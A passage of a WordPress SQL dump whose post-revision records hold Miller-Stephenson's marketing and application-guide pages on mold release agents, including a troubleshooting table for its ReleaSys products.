chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-09 16:08:46', '2016-11-09 16:08:46', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2969, 3, '2016-11-09 16:09:54', '2016-11-09 16:09:54', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed.PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-09 16:09:54', '2016-11-09 16:09:54', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2970, 3, '2016-11-09 16:12:01', '2016-11-09 16:12:01', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed.PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-09 16:12:01', '2016-11-09 16:12:01', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2971, 3, '2016-11-09 16:17:11', '2016-11-09 16:17:11', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong><span data-text-bg="primary">Complete failure to obtain release</span></strong></span></td>\r\n<td><span data-text-bg="primary"><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;" data-text-bg="primary"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;" data-text-bg="primary">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-09 16:17:11', '2016-11-09 16:17:11', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2972, 2, '2016-11-09 16:48:46', '2016-11-09 16:48:46', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service 